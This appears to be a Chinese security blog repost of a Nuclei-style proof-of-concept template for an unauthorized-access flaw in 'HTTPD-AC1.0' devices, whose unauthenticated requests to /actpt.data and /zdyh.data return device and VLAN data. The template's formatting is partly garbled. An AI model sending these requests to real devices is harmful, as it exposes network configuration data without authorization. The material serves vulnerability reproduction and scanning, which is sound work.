GET /actpt.data HTTP/1.1
Content-Type: application/json
Host: {{Hostname}}
id: POC-HTTPD-AC-Unauthorized-Data
info:
name: HTTPD-AC1.0服务未授权漏洞
author: Husky
severity: medium
metadata:
header.server=="HTTPD_ac 1.0" :
http:
raw:
|
30s :
GET /actpt.data HTTP/1.1
Host: {{Hostname}}
application/json :
|
30s :
GET /zdyh.data HTTP/1.1
Host: {{Hostname}}
application/json :
matchers:
type: dsl
dsl:
status_code_1==200 && contains_all(body_1,"ap_name","device_id","vlan_id")
status_code_2==200 && contains_all(body_2,"list:","web_type",":")
# Enhanced by mp on 2024/08/24
原文始发于微信公众号(剁椒Muyou鱼头):【漏洞复现】HTTPD-AC1.0服务未授权漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论